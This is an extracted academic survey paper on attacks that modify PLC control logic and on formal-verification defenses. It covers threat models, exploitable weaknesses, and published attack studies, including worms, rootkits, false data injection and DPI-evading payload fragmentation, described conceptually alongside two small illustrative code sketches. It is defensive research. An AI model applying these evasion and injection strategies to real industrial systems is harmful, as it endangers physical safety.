Threat model: this refers to the requirements and 3852021 IEEE European Symposium on Security and Privacy (EuroS&P) 2021, Ruimin Sun. Under license to IEEE. DOI 10.1109/EuroSP51992.2021.000342021 IEEE European Symposium on Security and Privacy (EuroS&P) | 978-1-6654-1491-3/21/$31.00 2021 IEEE | DOI: 10.1109/EUROSP51992.2021.00034 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. assumptions to perform the attacks/defenses. Security goal: this refers to the security properties affected by attacks/defenses. Weakness: this refers to the aw triggered to performthe attacks. Detection to evade: this refers to the detection thatfails to capture the attacks. Challenge: this refers to the challenges in defendingthe attacks the advance of attacks, and the insuf -ciency of defenses. Defense focus: this refers to the speci c researchtopic in formal veri cation, e.g. behavior modeling,state reduction, speci cation generation, and formalveri cation. We found that control logic modi cation attacks could happen under every threat model and considered variousevasive techniques. The attacks have been fast evolvingwith the system design, through input channels from thesensors, the engineering stations, and other connectedPLCs. The attacks could also evade dynamic state es-timations and veri cation techniques through leveragingimplicitly speci ed properties. Multiple attacks [54], [64],[83] even deceived engineering stations with fake behav-iors. We also found that applying formal veri cation has made great progress in improving code quality [97].However, the majority of the studies investigated ad-hoc formal veri cation research targeting PLC programs.These studies face challenges in many aspects of formalveri cation, during program modeling, state reduction,speci cation generation, and veri cation. We found manystudies manually de ne domain-speci c safety properties,and verify them based on a few simple test cases. Despitethe limitation of test cases, the implicitness of propertieswas not well explored, even though such properties havebeen used to conduct input manipulation attacks [68] [70]. Besides implicit properties, speci cation generationhas seen challenges in catching up with program model-ing, to support semantics and rules from new attack sur-faces. In addition, the real-time constraint limited runtimeveri cation in supporting temporal features, event-drivenfeatures, and multitasks. The dependency on proprietaryand vendor-speci c techniques resulted in ad-hoc studies.The lack of open source tools impeded thorough evalu-ation across models, frameworks, and real programs inindustry complexity. As a call for solutions to address these challenges, we highlight the need of defending security issues besidessafety issues, and we provide a set of recommendations forfuture research directions. We recommend future researchto pay attention to plant modeling and to defend againstinput manipulation attacks. We recommend the collabora-tion between state reduction and stealthy attack detection.We highlight the need for automatic generation of domain-speci c and incremental speci cations. We also encouragemore exploration in real-time veri cation, together withmore support in open-source tools, and thorough perfor-mance and security evaluation. Our study makes the following contributions: Systematization of control logic modi cation attacksand formal veri cation-based defenses in the lastthirty years. 
Figure 2: The architecture of a PLC. Identifying the challenges in defending control logicmodi cation attacks, and barriers existed in currentformal veri cation research. Pointing out future research directions. The rest of the paper is organized as follows. Section 2brie y describes the background knowledge of PLCs and formal veri cation. Section 3describes the motivation of this work and the methodology of the systematization.Section 4and Section 5systematize existing studies on control logic modi cation attacks, and formal veri cation-based defenses categorized on threat models and the ap-proaches to perform the attack/defense. Section 6provides recommendations for future research directions to counterexisting challenges. Section 7concludes the paper. 2. Background 2.1. PLC Program 2.1.1. Programming languages. IEC-61131 [87] de ned ve types of languages for PLC source code: Ladder diagram (LD), Structured text (ST), Function block diagram (FBD), Sequential function chart (SFC), Instruction list (IL). Among them, LD, FBD, and SFC are graph-based languages. IL was deprecated in 2013. PLC programsare developed in engineering stations, which provide standard-compliant or vendor-speci c Integrated Devel-opment Environments (IDEs) and compilers. Some high-end PLCs also support computer-compatible languages(e.g., C, BASIC, and assembly), special high-level lan- guages (e.g., Siemens GRAPH5 [2]), and boolean logic languages [67]. 2.1.2. Program bytecode/binary. An engineering sta- tion may compile source code to bytecode or binary depending on the type of a PLC. For example, SiemensS7 compiles source code to proprietary MC7 bytecodeand uses PLC runtime to interpret the bytecode, whileCODESYS compiles source code to binaries (i.e. nativemachine code) [55]. Unlike conventional software thatfollows well-documented formats, such as Executable andLinkable Format (ELF) for Linux and Portable Executable(PE) for Windows, the format of PLC binaries is oftenproprietary and unknown. Therefore, further explorationrequires reverse engineering. 2.1.3. Scan cycle. Unlike conventional software, a PLC program executes by in nitely repeating a scan cycle that 386 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. consists of three steps (as Figure 2shows). First, the input scan reads the inputs from the connected sensors and saves them to a data table. Then, the logic execution feeds the input data to the program and executes the logic. Finally, the output scan produces the output to the physical processes based on the execution result. The scan cycle must comply with strict prede ned timing constraints to enforce the real-time execution. TheI/O operations are the critical part in meeting the cycletime. 2.1.4. Hardware support. PLCs adopt a hierarchical memory, with prede ned addressing scheme associated with physical hardware locations. PLC vendors maychoose different schemes for I/O addressing, memoryorganization, and instruction sets, making it hard for thesame code to be compatible across vendors, or evenmodels within the same vendor. 2.2. PLC program security PLCs interact with a broad set of components, as Figure 3shows. They are connected to sensors and ac- tuators to interact with and control the physical world.They are connected to supervisory human interfaces (e.g.the engineering station) to update the program and receiveoperator commands. They may also be interconnected in asubnet. 
These interactions expose PLCs to various attacks.For example, communication between the engineeringstation and the PLC may be insecure, the sensors might becompromised, and the PLC rmware can be vulnerable. 2.2.1. Control logic modi cation. Our study considers control logic modi cation attacks, which we de ne as attacks that can change the behavior of PLC control logic.Control logic modi cation attacks can be achieved throughprogram payload/code modi cation and/or program input manipulation. The payload modi cation can be applied toprogram source code, bytecode or binary (Section 2.1). The input manipulation can craft input data to exploitexisted design aws in the program to produce undesiredstates. The input may come from any interacting compo-nents showed in Figure 3. Defending against these attacks is challenging. As we mentioned earlier, PLCs have to strictly maintain the scancycle time to control the physical world in real-time.This requirement overweights security solutions requir-ing a large amount of dynamic analysis. Moreover, thesecurity solution has to be accurate, since the controlledphysical processes are critical in the industry, making falsepositives less tolerable. 2.2.2. Formal veri cation. Formal veri cation is a lightweight and accurate defense solution, which is often tailored for graphical languages. This makes it suitable todefend against control logic modi cation attacks. Formal veri cation is a method that proves or dis- proves if a program/algorithm meets its speci cations ordesired properties based on a certain form of logic [32].The speci cation may contain security requirements andsafety requirements. Commonly used mathematical mod-els to do formal veri cation include nite state machines,labeled transition systems, vector addition systems, Petrinets, timed automata, hybrid automata, process algebra,and formal semantics of programming languages, e.g.operational semantics, denotational semantics, axiomaticsemantics, and Hoare logic. In general, there are twotypes of formal analysis: model checking and theoremproving [45]. Model checking uses temporal logic todescribe speci cations, and ef cient search methods tocheck whether the speci cations hold for a given system.Theorem proving describes the system with a series oflogical formulae. It proves the formulae implying theproperty via deduction with inference rules provided bythe logical system. It usually requires more backgroundknowledge and nontrivial manual efforts. We will describethe commonly used frameworks and tools for formalveri cation in later sections. An extended background in Appendix Aprovides an example of an ST program controlling the traf c lights ina road intersection, an example of an input manipulationattack, and the process of using formal veri cation todetect and prevent it. 3. Motivation and Methodology In this section, we rst explain our focus on control logic modi cation attacks and formal veri cation-basedprotection. Then, we use an example to introduce oursystematization methodology. 3.1. Motivation We focus on control logic modi cation due to its criti- cal impact on the PLC industry. Control logic modi cationcovers attacks from program payload (i.e. program code)modi cation to data input manipulation. These attacksresult from frequently reported vulnerabilities, and alsocause unsafe behaviors to the critical industrial infrastruc-ture, as Figure 1shows. To mitigate control logic modi cation attacks, exten- sive studies have been performed using formal methodson PLC programs. 
Formal methods have demonstrateduniqueness and practicality to the PLC industry. For ex-ample, Beckhoff TwinCat 3 and Nuclear DevelopmentEnvironment 2.0 have integrated safety veri cation dur-ing PLC program implementation [56]. Formal methodshave also been used in the PLC programs controllingOntario Power Generation, and Darlington Nuclear PowerGenerating Station [76]. Nevertheless, we found existingresearch to be ad-hoc, and the area is still new to thesecurity community. We believe our systematization canbene t the community with recommendations for futureresearch directions. Besides formal methods, there are additional defense techniques. At the design level, one can use encryptednetwork communication, private sensor inputs, and isolatedifferent functionalities of the engineering station. Theseprotections are orthogonal to formal methods and commonfor any type of software/architecture. In addition, onecan leverage intrusion detection techniques with dynamicanalysis. Such analysis often involves complex algorithms,such as machine learning or neural networks, which re-quire extensive runtime memory, and may introduce falsepositives. However, PLCs have limited memory and are 387 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply.                  Figure 3: A PLC controlling traf c light signals. less tolerant to false positives, given the controlled physi- cal processes can be safety-critical. Thus, intrusion detec-tion for PLC programs are less practical than for regularsoftware. To improve PLC security, formal methods cancooperate with these techniques. 3.2. Methodology 3.2.1. Motivating Example. Figure 3shows a motivating example with a PLC controlling traf c light signals at anintersection. In step 1/circlecopyrt, a PLC program developer pro- grams the control logic code in one of the ve languagesdescribed in Section 2.1.1, in an engineering station (e.g. located in the transportation department). The engineeringstation compiles the code into bytecode or binary basedon the type of the PLC. Then in step 2/circlecopyrt, the compiled bytecode/binary will be transmitted to the PLC located at aroad intersection through network communication. In step 3/circlecopyrt, the bytecode/binary will run in the PLC, by using the input from sensors (e.g. whether a pedestrian presses thebutton to cross the intersection), and producing output tocontrol the physical processes (i.e. turning on/off a greenlight). The duration of lights will depend on whether apedestrian presses the button to cross. Within each step, vulnerabilities can exist which al- low attackers to affect the behavior of the control logic.The following describes the threat model assumptions forattackers to perform control logic modi cation attacks. 3.2.2. Threat Model Assumptions. T1: In this threat model, attackers assume accesses to the program source code, developed in one of the languages described inSection 2.1.1. Attackers generate attacks by directly mod- ifying the source code. Such attacks happen in the en-gineering station as step 1/circlecopyrtin Figure 3. Attackers can be internal staffs who have accesses to the engineeringstation, or can leverage vulnerabilities of the engineeringstation [1], [50], [51] to access it. T2: In this threat model, attackers have no access to program source code but can access program bytecode or binary. 
Attackers generate attacks by rst reverse en-gineering the program bytecode/binary, then modifyingthe decompiled code, and nally recompiling it. Suchattacks happen during the bytecode/binary transmissionfrom the engineering station to the PLC ( 2/circlecopyrtin Figure 3). Attackers can intercept and modify the transmissionleveraging vulnerabilities in the network communication[48], [49], [52]. T3: In this threat model, attackers have no access to program source code nor bytecode/binary. Instead, attack-ers can guess/speculate the logic of the control programby accessing the program runtime environment, including the PLC rmware, hardware, or/and Input and Outputtraces. Attackers can modify the real-time sensor input tothe program ( 3/circlecopyrtin Figure 3). Such attacks are practical since within the same domain, the general settings of theinfrastructure layout are similar, and infrastructures (e.g.traf c lights) can be publicly accessible [3], [43], [69]. 3.2.3. Weaknesses. Attackers usually leverage existing program weaknesses for control logic modi cation. The following enumerates the weaknesses.W1: Multiple assignments for output variables. Race con-dition can happen when an output variable depends onmultiple timers or counters. Since one timer may runfaster or slower than the other, at a certain moment, theoutput variable will produce a non-deterministic value. Inthe traf c light example, this may cause the green lightto be on and off in a short time, or two lights to be onsimultaneously.W2: Uninitialized or unused variables. An uninitializedvariable will be given the default value in a PLC program.If an input variable is uninitialized, attackers can provideillegal values for it during runtime. Similarly, attackerscan leverage unused output variables to send private in-formation.W3: Hidden jumpers. Such jumpers will usually bypass aportion of the program, and are only triggered on a certain(attacker-controlled) condition. The attackers can embedmalware in the bypassed portion of the program.W4: Improper runtime input. Attackers can craft illegalinput values based on the types of the input variables tocause unsafe behavior. For example, attackers can providean input index that is out-of-the-bound of an array.W5: Prede ned memory layout of the PLC hardware. PLCaddressing usually follows the format [6] of a storageclass (e.g. Ifor input, Qfor output), a data size (e.g. XforBOOL ,WforWORD ), and a hierarchical address indicating the location of the physical port. Attackerscan leverage the format to speculate the variables duringruntime.W6: Real-time constraints. The scan cycle has to strictlyfollow a maximum cycle time to enforce the real-timeexecution. In non-preemptive multitask programs, one taskhas to wait for the completion of another task beforestarting the next scan cycle. To generate synchronizationattacks, attackers can create loops or introduce a largenumber of I/O operations to extend the execution time. Among the weaknesses, attackers need accurate pro- gram information to exploit W1, W2, and W3. Therefore, these attacks usually happen in T1. To disguise the mod- i cation to the source code, attackers in T1can include these weaknesses as bad coding practice, without affectingthe major control logic. The other weaknesses are usuallyexploited in T2and T3. 3.2.4. Security Goals. The security goals of existing studies are related to the security properties of CIA:con dentiality, integrity, and availability.GC: Con dentiality. 
The attacks violate con dentiality by stealthily monitoring the execution of PLC programsleveraging existing weaknesses (e.g. W2, W3). Formalveri cation approaches defend accordingly.GI: Integrity. The attacks violate integrity by causing PLC programs to produce states that are unsafe for thephysical process (e.g. plant), for example, over owing a 388 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. water tank, or uctuating power generation [11], [58], [85]. Formal veri cation approaches defend by verify-ing (i) generic properties that are process-independent, and (ii) domain-speci c properties that consider the plant model. Due to the amount of studies targeting GI, wefurther split GI into generic payload modi cation (GI 1) without program I/O nor plant settings, generic input ma-nipulation (GI 2) with program I/O, domain-speci c pay- load modi cation (GI 3) with plant settings, and domain- speci c input manipulation ( GI 4) with program I/O and plant settings. GA: Availability.: The attacks violate availability by ex- hausting PLC resources (memory or processing power)and causing a denial-of-service. Formal veri cation ap-proaches defend accordingly. 4. Systematization of Attacks This section systematizes PLC attack methodologies under the categorization of threat models. Within eachcategory, we discuss the goals of the attacks and theunderlying weaknesses. We also summarize the challengesof attack mitigation. 4.1. Attack Methodologies Given the exposed threat models, the following section describes the attack methodologies of existing studiesaccording to the security goals. Table 1summarizes these studies. 4.1.1. T1: program source code. At the source code level, the code injection or modi cation has to be stealthy, in a way that no observable changes would be introducedto the major functionality of the program, or masked asnovice programmer mistakes. In other words, the attackscould be disguised as unintentional bad coding practices. Existing studies [84], [88] mainly discussed attacks on graphical languages, e.g. LD, because small changes onsuch programs could not be easily noticed. Serhane et.al [84] focused on the weak points on LD programs that could be exploited by malicious attacks.Targeting G1to cause unsafe behaviors, attackers could generate uncertainly uctuating output variables, for ex-ample, intentionally introducing two timers to control thesame output variable, could lead to a race condition. Thiscould damage devices, similar to Stuxnet [33], but unpre-dictably. Attackers could also bypass certain functions,manually force the values of certain operands, or applyempty branches or jumps. Targeting G2to stay stealthy while spying the pro- gram, attackers could use array instructions or user-de ned instructions, to log critical parameters and values.Targeting G3to generate DoS attacks, attackers could apply an in nite loop via jumps, and use nest timers andjumps to only trigger the attack at a certain time. Thisattack could slow down or crash the PLC in a severematter. Because PLC programmers often leave unused vari- ables and operands, both the spying program and the DoSprogram could leverage unused programming resources. These attacks leveraged weaknesses W1-W4, and fo- cused on single ladder program. 
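The race condition behind W1 can be conveyed with a small simulation. The sketch below is written in Python rather than ladder logic and abstracts rung evaluation to last-write-wins within a scan; the two timer periods are hypothetical, chosen only so that their phase relationship keeps shifting:

# Toy illustration of weakness W1 (multiple assignments to one output):
# two free-running timers with different periods both write the same coil,
# so the "last writer wins" value flips depending on their phase.
# Simulated in Python rather than ladder logic; periods are hypothetical.

def simulate(cycles, period_a=7, period_b=11):
    history = []
    for tick in range(cycles):
        timer_a_done = (tick % period_a) == 0     # first timer branch
        timer_b_done = (tick % period_b) == 0     # second timer branch
        coil = False
        if timer_a_done:
            coil = True                            # rung 1 writes the coil
        if timer_b_done:
            coil = False                           # rung 2 overwrites it
        history.append(coil)
    return history

if __name__ == "__main__":
    trace = simulate(80)
    flips = sum(1 for a, b in zip(trace, trace[1:]) if a != b)
    print(f"coil changed value {flips} times in 80 scan cycles")

Depending on which rung fires in a given scan, the coil value flips in a pattern that looks erratic to an operator, which is why such constructs can pass for novice mistakes while still damaging the actuator they drive.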
To extend the attacks tomulti-ladder programs, Valentine et.al [88] further pre- sented attacks that could install a jump to a subroutinecommand, and modify the interaction between two ormore ladders in a program. This could be disguised asan erroneous use of scope and linkage by a novice pro-grammer. In addition to code injection and modi cation, McLaughlin et.al [69] presented input manipulation at- tacks to cause unsafe behaviors. This study analyzed thecode to obtain the relationship between the input andoutput variables and deducted the desired range for outputvariables. Attackers can craft inputs that could lead toundesired outputs for the program. The crafted inputs haveto evade the state estimation detection of the PLC. Sincethe input manipulation happens in T3, and more studies discussed input manipulation attacks without using sourcecode, we will elaborate on these attacks in T3. 4.1.2. T2: program bytecode/binary. Studies at this threat model mainly investigated program reverse engi-neering, and program modi cation attacks. Instead ofdisguising as bad coding practices, like those in T1, the injection at the program binary aimed at evading behaviordetectors. To design an attack prototype, McLaughlin et.al [70] tested on a train interlocking program. The program wasreverse engineered using a format library. With the decom-piled program, they extracted the eldbus ID that indicatedthe PLC vendor and model, and then obtained cluesabout the process structure and operations. To generateunsafe behaviors, such as causing con ict states for thetrain signals, they targeted timing-sensitive signals andswitches. To evade safety property detection, they adoptedan existed solution [34] to nd the implicit properties ofthe behavior detectors. For example, variable rdepends on pandq, so a property may de ne the relationship between pandq, as a method to protect r. However, attackers can directly change the value of rwithout affecting pandq, and the change will not alarm the detector. In this way,they automatically searched for all the Boolean equations,and could generate malicious payloads based on that. Based on this prototype, SABOT [68] was imple- mented. SABOT required a high-level description of thephysical process, for example, the plant contains twoingredient valves and one drain valve . Such informationcould be acquired from public channels, and are similarfor processes in the same industrial sector. With thisinformation, SABOT generated a behavioral speci cationfor the physical processes and used incremental modelchecking to search for a mapping between a variablewithin the program, and a speci ed physical process.Using this map, SABOT compiled a dynamic payloadcustomized for the physical process. Both studies were limited to Siemens devices, with- out revealing many details on reverse engineering. Toprovide more information, and support CodeSys-basedprograms, Keliris et.al [55] implemented an open-source decompiler, ICSREF, which could automatically reverseengineer CodeSys-based programs, and generate mali-cious payloads. ICSREF targeted PID controller functionsand manipulated the parameters such as the setpoints,proportional/integral/derivative gains, initial values, etc.ICSREF inferred the physical characteristics of the con- 389 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:36:17 UTC from IEEE Xplore. Restrictions apply. TABLE 1: The studies investigating control logic modi cation attacks. 
Threat Model | Paper | Weakness | Security Goal | Attack Type | Detection to Evade | Network Access | PLC Language/Type | Tools
T1 source code | Serhane 18 [84] | W1,2,3 | GI1,GC,GA | both | Programmer | ES | LD, RSLogix | N/A
T1 source code | Valentine 13 [88] | W1,2,3,6 | GI1,GC | passive | Programmer | N/A | LD | PLC-SF, vul. assessment
T1 source code | McLaughlin 11 [70] | W4 | GI3 | both | State verif. | ES | generic | N/A
T2 bytecode/binary | ICSREF [55] | W4 | GI3 | passive | N/A | ES,PLC | Codesys-based | angr, ICSREF
T2 bytecode/binary | SABOT [68] | W4 | GI3 | passive | N/A | ES,PLC | IL | NuSMV
T2 bytecode/binary | McLaughlin 11 [70] | W4 | GI3 | both | State verif. | ES,PLC | generic | N/A
T3 runtime | PLCInject [58] | W5 | GC | both | N/A | ES,PLC | IL, Siemens | PLCInject malware
T3 runtime | PLC-Blaster [85] | W5 | GC,GA | active | N/A | ES,Sensor,PLC | Siemens | PLC-Blaster worm
T3 runtime | Senthivel 18 [83] | W4 | GI1 | active | ES | ES,PLC | LD, AB/RsLogix | PyShark, decompiler Laddis
T3 runtime | CLIK [54] | W4 | GI1 | both | ES | PLC | IL, Schneider | Eupheus decompilation
T3 runtime | Beresford 11 [11] | W4,5 | GI2 | both | N/A | ES,PLC | Siemens S7 | Wireshark, Metasploit
T3 runtime | Lim 17 [64] | W4,5 | GI4,GA | active | ES | ES,PLC | Tricon PLC | LabView, PXI Chassis, Scapy
T3 runtime | Xiao 16 [92] | W4 | GI4 | both | State verif. | Sensor,PLC | generic | N/A
T3 runtime | Abbasi 16 [3] | W4 | GI2 | both | Others | N/A | Codesys-based | Codesys platform
T3 runtime | Yoo 19 [94] | W5 | GI1 | both | Others | ES,PLC | Schneider/AB | DPI and detection tools
T3 runtime | LLB [43] | W4,6 | GI1,GI2 | both | Programmer | ES,PLC | LD, AB | Studio 5000, RSLinx, LLB
T3 runtime | CaFDI [69] | W4 | GI4 | both | State verif. | N/A | generic | CaFDI
T3 runtime | HARVEY [37] | W4,5 | GI4,GC | both | ES | ES,PLC | AB | Hex, dis-assembler, EMS
Engineering Station (ES), Allen-Bradley (AB). Tools: vulnerability (vul.). Detection to evade: verification (verif.).
trolled process, so that modified binaries could deploy meaningful and impactful attacks.
4.1.3. T3: program runtime. At this level, existing studies investigated two types of attacks: the program modification attack and the program input manipulation attack. The input of the program could either come from the communication between the PLC and the engineering station, or from the sensor readings.
Program modification attack: this requires reverse engineering and payload injection, similar to studies in T2. The difference is that, with the PLC memory layout available and the features supported by the PLC known, the design of the payload becomes more targeted. Through injecting a malicious payload into the code, PLCInject [58] and PLC-Blaster [85] demonstrated the widespread impact of such payloads. PLCInject crafted a payload with a scanner and proxy. Due to the predefined memory layout of Siemens Simatic PLCs, PLCInject injected this payload at the first organization block (OB) to change the initialization of the system. This attack turned the PLC into a gateway of the network of PLCs. Using PLCInject, Spenneberg [85] implemented a worm, PLC-Blaster, that can spread among the PLCs. PLC-Blaster spread by replicating itself and modifying the target PLCs to execute it along with the already installed programs. PLC-Blaster adopted several anti-detection mechanisms, such as avoiding the anti-replay byte, storing itself at a rarely used block, and meeting the scan cycle limit. PLCInject and PLC-Blaster achieved G3 and demonstrated the widespread impact of program injection attacks. In addition to that, Senthivel et al. [83] introduced several malicious payloads that could deceive the engineering station. Since the engineering station periodically checks the running program from the PLC, the attackers could deceive it by providing an uninfected program while continuing to execute the infected program in the PLC. Senthivel achieved this through a self-developed decompiler (laddis) for LD programs.
Senthivel also introduced three strategies to achieve this denial of engineering operations attack. In a similar setting, Kalle et al. [54] presented CLIK. After payload injection, CLIK implemented a virtual PLC, which simulated the network traffic of the uninfected PLC and fed this traffic to the engineering station to deceive the operators. These two works employed a full chain of vulnerabilities at the network level, without accessing the engineering station or the PLCs.

Input manipulation through the network. Several studies [11], [64] hijacked certain network packets between the engineering station and a PLC. Beresford et al. [11] exploited a packet (e.g. ISO-TSAP) between the PLC and the engineering station. These packets provided program information, such as variable names, data block names, and also the PLC vendor and model. Attackers could modify these variables to cause undesired behavior. With memory probing techniques, attackers could get a mapping between these names and the variables in the PLC. This would allow them to modify the program as needed. This attack could cause damage to the physical processes. However, the chance of successfully mapping the variables through memory probing is small. In a nuclear power plant setting, Lim et al. [64] intercepted and modified the command-37 packets sent between the engineering station and the PLC. This packet provided input to an industrial-grade PLC consisting of redundant modules for recovery. The attack caused common-mode failures for all the modules.

These attacks made their entry point through the network traffic. However, they ignored the fact that security solutions could have enabled deep packet inspection (DPI) between the PLC and the engineering station. Modified packets with malicious code or input data could have been detected before reaching the PLC. To evade DPI, Yoo et al. [94], [95] presented stealthy malware transmission, splitting the malware into small fragments and transmitting one byte per packet padded with a large amount of noise. This works because DPI merges packets for detection and thus is not able to detect such small payloads. On the PLC side, Yoo leveraged a vulnerability to control the received malicious payload, discard the padded noise, and configure the start address for execution. Although dependent on multiple vulnerabilities, this study provided insight into stealthy program modification and input manipulation at the network level.

Input manipulation through sensors. Existing studies [3], [43], [69], [92] explored different approaches to evade various behavior detection mechanisms and to achieve G1.

Govil et al. [43] presented ladder logic bombs (LLB), a combination of program injection and input manipulation attacks. The malicious payload was injected into the existing LD program as a subroutine and could be triggered by a certain condition. Once triggered, this malware could replace legitimate sensor readings with manipulated values. LLB was designed to evade manual inspection by giving instructions names similar to commonly used ones. LLB did not consider behavior detection, such as state verification or state estimation.

To counter Büchi automaton based state estimation, CaFDI [69] introduced controller-aware false data injection attacks. CaFDI required high-level information about the physical processes and monitored I/O traces of the program.
It first constructed a Büchi automaton model of the program based on its I/O traces, and then searched for a set of inputs that may cause the model to produce the desired malicious behavior. CaFDI calculated the Cartesian product of the safe model and the unsafe model, and recursively searched for a path that could satisfy the unsafe model in the formalization. The resulting path of inputs would then be used as the sensor readings for the program. To stay stealthy, CaFDI avoided noticeable inputs, such as an LED indicator. Xiao [92] fine-tuned the undesired model to evade existing sequence-based fault detection [57]. An attacker could first construct a discrete event model from the collected fault-free I/O traces using a non-deterministic autonomous automaton with output (NDAAO), then build a word set of NDAAO sequences, and finally search for undetectable false sequences from the word set to inject into the compromised sensors. Similarly, by combining the control flow of the program, Abbasi et al. [3] presented configuration manipulation attacks that exploit certain pin control operations, leveraging the absence of hardware interrupts associated with the pins.

To evade the general engineering operations, Garcia [37] developed HARVEY, a PLC rootkit at the firmware level that can evade operators viewing the HMI. HARVEY faked sensor input to the control logic to generate adversarial commands, while simulating the legitimate control commands that an operator would expect to see. In this way, HARVEY could maximize the damage to the physical power equipment and cause large-scale failures, without operators noticing the attack. HARVEY assumed access to the PLC firmware, which was less monitored than the control logic program.

These studies make it practical to inject malicious payloads either through a compromised network or through insecure sensor configurations. Because of their stealthiness, it remains challenging to design security solutions to counter them. The following details the challenges.

4.2. Challenges

Expanded attack input surfaces. The attack input surfaces for PLC programs are expanding. The aforementioned studies have shown input sources including (1) the communication from the engineering station, with certain packets intercepted and hijacked, (2) Internet-facing PLCs in the same subnet, and (3) compromised sensors and firmware. It becomes challenging for defense solutions to scope an appropriate threat model, since any component along the chain of control could be compromised.

Predefined hierarchical memory layout. Multiple studies leveraged this weakness to perform their attacks. However, traditional defense solutions [22] face many challenges: (1) address space layout randomization (ASLR) would be too heavy to meet the scan cycle requirements of the PLCs, and would still suffer from code-reuse attacks, (2) control flow integrity based solutions require a substantial amount of memory, and would be hard to use for detecting or mitigating the attacks in real time, and (3) the hierarchical memory layout is vendor-specific, and the attacks targeting it are product-driven, for example, Siemens Simatic S7 [11], [85]. It is challenging to design a lightweight and generalized defense solution.

Confidentiality and integrity of the program I/O. The majority of the studies depended on the program I/O to perform attacks, either to extract information about the physical processes and possible detection methods, or to manipulate input to produce unsafe behaviors.
Protecting I/O is challenging in that (1) the input surfaces of the programs are expanding, (2) sensors and physical processes could be public infrastructure, and (3) the I/O has to be updated frequently to meet the scan cycle requirement.

Stealthy attack detection. We have mentioned many stealthiness strategies based on different threat models, including (1) disguising malicious code as human errors, (2) code obfuscation with fragmentation and noise padding to evade DPI, (3) crafting input to evade state estimation and verification algorithms, (4) using specific memory blocks or configurations of the PLC, and (5) deceiving the engineering station with faked legitimate behaviors. It is challenging for a defense solution to capture these stealthy attacks.

Implicit or incomplete specifications. Multiple studies have shown crafted attacks using implicit properties [68], [70]. The difficulties of defining precise and complete specifications lie in that (1) product requirements may change over time, requiring updates to the semantics of inputs and outputs, (2) limited expressiveness can lead to incompleteness, while over-expressiveness may lead to implicitness, and (3) domain-specific knowledge is usually needed. It is challenging to design specifications that overcome these difficulties.

5. Formal Verification based Defenses

A large body of research uses formal verification for PLC safety and security, as Table 3 shows. This line of work mainly focuses on the following aspects:

Behavior Modeling: modeling the behavior of the program as a state-based, flow-oriented, or time-dependent representation.

State Reduction: reducing the state space to improve search efficiency.

Specification Generation: generating the specification with the desired properties as a temporal logic formula.

Verification: applying model checking or theorem proving algorithms to verify the security or safety of the PLC program.

Based on these aspects, the following discusses defense methodologies. We use the same threat models, security goals, and weaknesses as mentioned in Section 3.2.

5.1. Behavior Modeling

The goal of behavior modeling is to obtain a formal representation of the PLC program behavior, so that, given a specification, a formal verification framework can understand and verify it. The following discusses behavior modeling under the different threat models.

5.1.1. T1: program source code. At the source code level, a line of studies [4], [30], [41], [76] has investigated the formal modeling of generic program behaviors. The majority of them translated programs to automata and Petri nets, since these are well supported by most formal verification frameworks [4]. These translations usually consider each program unit as an automaton, including the main program, functions, and function block instances. Each variable defined in the program unit is translated into a corresponding variable in the automaton. Input variables are assigned non-deterministically at the beginning of each PLC cycle. The whole program is modeled as a network of automata, where a transition represents the changes of variable values across execution cycles, and a synchronization pair represents synchronized transitions of function calls. In a similar modeling method, Newell et al. [76] translated FBD programs to Prototype Verification System (PVS) models, since certain nuclear power generating stations can only support such a representation.
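As a deliberately tiny illustration of this modeling style, the sketch below encodes a hypothetical two-output interlock program as a transition system: inputs are picked non-deterministically at the start of every scan cycle, one transition corresponds to one cycle, and a breadth-first exploration checks a simple invariant. The program, the variable names, and the invariant are ours, not taken from the cited studies.

```python
from collections import deque
from itertools import product

def scan_cycle(state, inputs):
    """One scan cycle of a toy interlock program: each command latches its
    valve, and the opposite command acts as an interlock that resets it."""
    fill_cmd, drain_cmd = inputs
    fill = (state["fill"] or fill_cmd) and not drain_cmd
    drain = (state["drain"] or drain_cmd) and not fill_cmd
    return {"fill": fill, "drain": drain}

def check_invariant(initial, invariant, max_cycles=16):
    """Explicit-state exploration of the scan-cycle transition system.
    Inputs are non-deterministic: every combination is tried each cycle."""
    seen = set()
    frontier = deque([(frozenset(initial.items()), 0)])
    while frontier:
        frozen, depth = frontier.popleft()
        state = dict(frozen)
        if not invariant(state):
            return False, state                      # counterexample state
        if frozen in seen or depth >= max_cycles:
            continue
        seen.add(frozen)
        for inputs in product([False, True], repeat=2):
            frontier.append((frozenset(scan_cycle(state, inputs).items()), depth + 1))
    return True, None

# Safety property: both valves must never be open at the same time.
# For this toy program the invariant holds; removing the `and not drain_cmd`
# guard on `fill` lets the exploration reach a state with both valves open.
ok, bad_state = check_invariant({"fill": False, "drain": False},
                                lambda s: not (s["fill"] and s["drain"]))
print(ok, bad_state)
```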
These studies could formally model most PLC behaviors, especially the internal logic within the PLC code. However, with only source code available, behavior modeling lacks the interaction with the PLC hardware and the physical processes, which might allow unsafe or malicious behaviors to bypass the subsequent formal verification. The following discusses behavior modeling with more information available.

5.1.2. T2: program bytecode/binary. Fewer studies have investigated behavior modeling at the program binary level. The challenges lie in reverse engineering. As mentioned in existing works [71], [100], several PLC features are not supported in normal instruction sets. PLCs are designed with hierarchical addressing using a dedicated memory area for the input and output buffers. The function blocks use a parameter list with fixed entry and exit points. PLCs also support timers that act differently between bit-logic instructions and arithmetic instructions.

Thanks to an open-source library [60], which can disassemble Siemens PLC binary programs into STL (the IL equivalent for Siemens) programs, several works [21], [71], [93], [100] studied modeling Siemens binary programs. Based on the STL program, TSV [71] leveraged an intermediate language, ILIL, to allow more complete instruction modeling. With concolic execution, TSV obtained the information flow from the system registers and the memory. After executing multiple scan cycles, a temporal execution graph was constructed to represent the states of the controller code. After TSV, Zonouz et al. [100] adopted the same modeling. Chang et al. [21] and Xie et al. [93] constructed control flow graphs with similar executable paths. Chang deduced the output states of the timers based on the existing output state transition relationships, while Xie used constraints to model the program.

